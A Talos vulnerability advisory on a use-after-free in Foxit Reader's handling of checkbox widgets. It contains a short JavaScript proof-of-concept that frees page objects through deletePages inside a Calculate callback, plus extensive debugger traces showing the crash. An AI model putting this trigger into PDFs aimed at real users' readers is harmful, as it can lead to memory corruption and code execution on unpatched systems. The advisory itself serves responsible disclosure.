Talos Vulnerability Report

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a checkbox CBF_Widget object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.3.0.26795

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a checkbox object. This can be illustrated by the following proof-of-concept code:

function main() { 

 app.activeDocs[0].addField("AA", "checkbox", 2, [17,0,5,14] ) ;

 app.activeDocs[0].getField("AA").defaultIsChecked(0); 

 getField("txt3").setAction("Calculate",'delete_page();');

 app.activeDocs[0].addField("AA", "checkbox", 0, [17,0,5,14] ) ; 

}


function delete_page() { 

app.activeDocs[0].deletePages(); 
app.activeDocs[0].deletePages(); 

}

The above code creates a checkbox field object. A callback function is assigned to the TextField object’s Calculate event, which is promptly triggered by the second call to addField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a checkbox object is freed by deletePages() and it is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
eax=0058e4c0 ebx=0058e52c ecx=030d4520 edx=00000002 esi=118dc2f8 edi=118dc2b8
eip=03413e79 esp=0058e498 ebp=0058e4d8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1265300 (030d4520)}
0:000> g
eax=0058e4b8 ebx=0058e524 ecx=0306d8f0 edx=00000002 esi=11854e98 edi=13c387f8
eip=03413e79 esp=0058e490 ebp=0058e4d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11fe6d0 (0306d8f0)} <----------------- (1)

[...]
0:000> p
eax=190bfe00 ebx=190bfe00 ecx=190bfe00 edx=00000009 esi=00000000 edi=190aa4a0
eip=01e3bc2f esp=0058e0bc ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7af:
01e3bc2f 6a64            push    64h                                           
0:000> p
eax=190bfe00 ebx=190bfe00 ecx=190bfe00 edx=00000009 esi=00000000 edi=190aa4a0
eip=01e3bc31 esp=0058e0b8 ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7b1:
01e3bc31 e8c0225d02      call    FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5e1da6 (0440def6) ; <----------------- (2)
0:000> p
eax=15df3bd8 ebx=190bfe00 ecx=00000064 edx=00000002 esi=00000000 edi=190aa4a0
eip=01e3bc36 esp=0058e0b8 ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7b6:
01e3bc36 83c404          add     esp,4
0:000> dd eax                                                ; <----------------- (3)
15df3bd8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3be8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3bf8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c08  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c18  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c28  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c38  e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> pc
eax=15df3bd8 ebx=190bfe00 ecx=15df3bd8 edx=00000002 esi=00000000 edi=190aa4a0
eip=01e3bc53 esp=0058e0ac ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7d3:
01e3bc53 e8585bfeff      call    FoxitPDFReader!CryptUIWizExport+0xa65330 (01e217b0)  ; <----------------- (4)
0:000> p
eax=15df3bd8 ebx=190bfe00 ecx=6f99f4b3 edx=00000000 esi=00000000 edi=190aa4a0
eip=01e3bc58 esp=0058e0bc ebp=0058e0e8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
FoxitPDFReader!CryptUIWizExport+0xa7f7d8:
01e3bc58 8bf0            mov     esi,eax
0:000> dd eax                                               ; <----------------- (5)
15df3bd8  04e9687c 11884ab0 190989e0 1379b8b8
15df3be8  e0e0e000 ffffffff 00000000 01000101
15df3bf8  00000004 00000000 10d478a0 00000000
15df3c08  117de4f4 190aa4a0 139953b8 00000000
15df3c18  00000000 00000000 00000000 00000000
15df3c28  00000000 e0e0e000 00000000 00000000
15df3c38  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6

At (1), the javascript::CFXJS_Document::addField_static method associated with the JavaScript API addField() is called. The call at (2) creates the vulnerable CBF_Widget object with a size of 0x64. The vulnerable buffer can be examined at (3). The CBF_Widget object is initialized by the call at (4), and its value after initialization can be observed at (5).

0:000> g
eax=0058da28 ebx=0058da94 ecx=0306eef0 edx=00000002 esi=1186d4c0 edi=1186d480
eip=03413e79 esp=0058da00 ebp=0058da40 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)} ; <----------------- (6)

[...]
0:000> p
eax=15ae5a70 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=15ae5a60
eip=00c0a4ba esp=0058d868 ebp=0058d870 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb51a:
00c0a4ba 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=0058d88c
0:000> pc
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0a4ea esp=0058d848 ebp=0058d870 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb54a:
00c0a4ea e871350000      call    FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeeac0 (00c0da60) ; <----------------- (7)
[...]
0:000> p
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0da6a esp=0058d838 ebp=0058d840 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeeaca:
00c0da6a 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=0058d864
0:000> p
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0da70 esp=0058d838 ebp=0058d840 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeead0:
00c0da70 50              push    eax
0:000> g
before free
eax=10d8e2f4 ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df7f esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefdf:
00c0df7f 8b01            mov     eax,dword ptr [ecx]  ds:002b:15df3bd8=04e9687c
0:000> t
eax=04e9687c ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df81 esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe1:
00c0df81 6a01            push    1
0:000> t
eax=04e9687c ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df83 esp=0058b40c ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe3:
00c0df83 ff5004          call    dword ptr [eax+4]    ds:002b:04e96880=01e21c10 ; <----------------- (8)
0:000> dd 15df3bd8                           ; <----------------------------------- (9)
15df3bd8  04e9687c 11884ab0 190989e0 1379b8b8
15df3be8  e0e0e000 00000001 117de598 01000101
15df3bf8  00000004 00000000 10d478a0 00000000
15df3c08  117de4f4 190aa4a0 139953b8 00000000
15df3c18  00000000 00000000 00000000 00000000
15df3c28  00000000 e0e0e000 00000000 00000000
15df3c38  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> p
eax=15df3bd8 ebx=10d8e2f4 ecx=15df3bd8 edx=00000001 esi=10d8e2f4 edi=1187bbf0
eip=00c0df86 esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe6:
00c0df86 8b4728          mov     eax,dword ptr [edi+28h] ds:002b:1187bc18=10d8e2f4
0:000> dd 15df3bd8                            ; <----------------------------------- (10)
15df3bd8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3be8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3bf8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c08  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c18  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c28  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c38  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6

At (6), the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. It calls CReader_Page::ClearAnnotData at (7), which frees a number of objects. This method invokes free at (8) on the vulnerable buffer. The value of the vulnerable object is examined at (9) and (10), showing the value before and after the free function is called. The vulnerable object is later used without any validation, which can be observed in a debugger at the time of the crash.

0:000> g
eax=0058e224 ebx=0058e384 ecx=00000000 edx=190a18dc esi=15df3bd8 edi=190bfe00
eip=01e23947 esp=0058e1f4 ebp=0058e254 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!CryptUIWizExport+0xa674c7:
01e23947 8d4e04          lea     ecx,[esi+4]
0:000> dd esi                        <-------------------------------  (11)
15df3bd8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3be8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3bf8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c08  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c18  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c28  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c38  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> p
eax=0058e224 ebx=0058e384 ecx=15df3bdc edx=190a18dc esi=15df3bd8 edi=190bfe00
eip=01e2394a esp=0058e1f4 ebp=0058e254 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!CryptUIWizExport+0xa674ca:
01e2394a e8914bdcfe      call    FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc9540 (00be84e0)
0:000> p
(1c34.1c2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=0058e384 ecx=00000001 edx=f0f0f0f4 esi=0058e224 edi=190bfe00
eip=00be853b esp=0058e1d4 ebp=0058e1ec iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b:
00be853b f00fc10a        lock xadd dword ptr [edx],ecx ds:002b:f0f0f0f4=????????  <----------------- (12)
0:000> u
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b:
00be853b f00fc10a        lock xadd dword ptr [edx],ecx
00be853f 8bc6            mov     eax,esi
00be8541 8b4df4          mov     ecx,dword ptr [ebp-0Ch]
00be8544 64890d00000000  mov     dword ptr fs:[0],ecx
00be854b 59              pop     ecx
00be854c 5e              pop     esi
00be854d 8be5            mov     esp,ebp
00be854f 5d              pop     ebp
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058e1ec 01e2394f     0058e224 6f99f643 137fb1f0 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b
01 0058e254 013f219e     0058e101 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0xa674cf
02 0058e2a0 030e6db0     0058e278 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0x35d1e
03 0058e370 030a2024     1908f320 0058e390 02431dd1 FoxitPDFReader!safe_vsnprintf+0x1277b90
04 0058e434 0306da42     13c387f8 0058e4b0 0058e45c FoxitPDFReader!safe_vsnprintf+0x1232e04
05 0058e488 03413e7b     13c387f8 0058e4b8 0058e4b0 FoxitPDFReader!safe_vsnprintf+0x11fe822
06 0058e4d0 035f824b     16313028 21f28cb5 16313028 FoxitPDFReader!FXJSE_GetClass+0x26b
07 0058e538 035f7a0e     0058e580 21f28cb5 0058e65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cbb
08 0058e5cc 035f7cc5     0058e5fc 16313028 0058e65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e347e
09 0058e614 035f7b4b     0058e62c 00000009 0058e678 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3735
0a 0058e630 038199db     00000009 0058e678 16313028 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35bb
0b 0058e650 037b5a39     208c2339 113cfcad 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40544b
0c 0058e6a8 037b5a39     113d4365 113e49d9 113e4a2d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14a9
0d 0058e6d4 037b40c0     113d4365 208c21b1 113e49d9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14a9
0e 0058e6ec 037b3ee9     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fb30
0f 0058e718 034506ee     16313028 208c2339 113e49d9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f959
10 0058e828 03450202     0058e9bc 16313028 0058e884 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c15e
11 0058e8b0 03438f04     0058e9bc 16313028 137abeb4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc72
12 0058ea60 03438a00     0058eafc 137abedc 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24974
13 0058ea74 034123ef     0058eafc 137abedc 6f99fefb FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24470
14 0058eaec 03412d26     137abeb4 15e60278 137abea0 FoxitPDFReader!FXJSE_Runtime_Release+0xfaf
15 0058eb28 030104c4     13b3f310 15589a1c 15e60278 FoxitPDFReader!FXJSE_ExecuteScript+0x86
16 0058eb8c 030113b0     00000000 0058ec18 0058ebc0 FoxitPDFReader!safe_vsnprintf+0x11a12a4
17 0058eba0 012170cf     0058ec18 0058ebc0 6f99ffc7 FoxitPDFReader!safe_vsnprintf+0x11a2190
18 0058ebd0 01215d04     10d1fe40 00000015 0058ebf8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c91ef
19 0058ec10 01214530     190a5020 163bff08 13b18a08 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c7e24
1a 0058ec64 00afcdd2     0058ec94 163bff08 13b18a08 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c6650
1b 0058ecb4 00d8271b     00000001 6f99eccf 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7802
1c 0058f8d8 0441bcd4     00000001 00000000 6f99edbf FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6c53b
1d 0058f9a8 0441cead     00000429 00000001 00000000 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5efb84
1e 0058f9cc 04417853     00000429 00000001 00000000 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5f0d5d
1f 0058fa40 044180c6     13bbf520 0003055a 00000429 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5eb703
20 0058fa60 7552171b     0003055a 00000429 00000001 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5ebf76
21 0058fa8c 75517e8a     04418092 0003055a 00000429 USER32!_InternalCallWinProc+0x2b
22 0058fb74 755167c1     04418092 00000000 00000429 USER32!UserCallWinProcCheckWow+0x33a
23 0058fbf0 755162e0     00000329 0058fc18 00d034e4 USER32!DispatchMessageWorker+0x4d1
24 0058fbfc 00d034e4     0c5e9b48 0c5e9b48 05f69798 USER32!DispatchMessageW+0x10
25 0058fc18 00d035a3     05f69798 00d03510 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4544
26 0058fc38 0484a70a     00000000 05f956ac 002d3000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4603
27 0058fc50 045ff41a     00910000 00000000 0c5853c4 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa1e5ba
28 0058fc9c 74fbfcc9     002d3000 74fbfcb0 0058fd08 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7d32ca
29 0058fcac 770a809e     002d3000 e4cdb485 00000000 KERNEL32!BaseThreadInitThunk+0x19
2a 0058fd08 770a806e     ffffffff 770c910a 00000000 ntdll!__RtlUserThreadStart+0x2f
2b 0058fd18 00000000     045ff4e9 002d3000 00000000 ntdll!_RtlUserThreadStart+0x1b

At (11) above, we can observe esi contains the same memory pointer, which belongs to a freed allocation. The crash occurs at (12) when the freed region is dereferenced whithout any validation. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

Please note that this vulnerability is a patch bypass of TALOS-2024-1967.

TIMELINE

2024-10-17 - Vendor Disclosure
2024-12-17 - Vendor Patch Release
2024-12-18 - Public Release